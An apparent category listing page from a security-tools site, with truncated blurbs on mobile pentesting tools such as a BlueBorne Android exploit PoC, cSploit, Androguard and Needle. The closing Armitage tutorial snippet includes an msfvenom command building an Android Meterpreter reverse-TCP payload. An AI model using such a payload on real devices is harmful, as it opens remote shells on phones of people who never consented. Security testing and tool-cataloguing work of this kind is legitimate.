Category: Smartphone PenTest

blueborne: BlueBorne Android Exploit PoC

BlueBorne Android Exploit PoC This repository contains a PoC code of BlueBorne’s Android RCE vulnerability (CVE-2017-0781). It also uses the SDP Information leak vulnerability (CVE-2017-0785) to bypass ASLR. It achieves code execution on a...

passionfruit

passionfruit: Crappy iOS app analyzer

Passionfruit Simple iOS app blackbox assessment tool. Powered by frida.re and vuejs. Features Fully web-based GUI! Only supports jailbroken device now. A non-jailbroken solution is on the way. List all url schemes. Screenshot. List humanly readable app...

cSploit: Android network pentesting suite

cSploit: Android network pentesting suite cSploit is a free/libre and open source (GPLed) Android network analysis and penetration suite which aims to be the most complete and advanced professional toolkit for IT security experts/geeks to perform network security assessments...

Android Arsenal – Reverse engineering tools

Androguard – reverse engineering , Android app malware and good software analysis Android Apk decompiler – Online decompile for Apk and Dex Android files Android loadble kernel module – it is mainly used in the controlled system/simulator on the reverse and debugging. AndBug – Android debug...

Android Arsenal: Reverse engineering tools

Androguard – reverse engineering , Android app malware and good software analysis Features Androguard is a full python tool to play with Android files. DEX, ODEX APK Android’s binary xml Android resources Disassemble DEX/ODEX bytecodes Decompiler for...

needle

needle: iOS Security Testing Framework

Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Assessing the security of an iOS application typically requires a plethora of tools, each developed for...

Exploit Android Smartphone using Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework. Create payload using metasploit msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port >...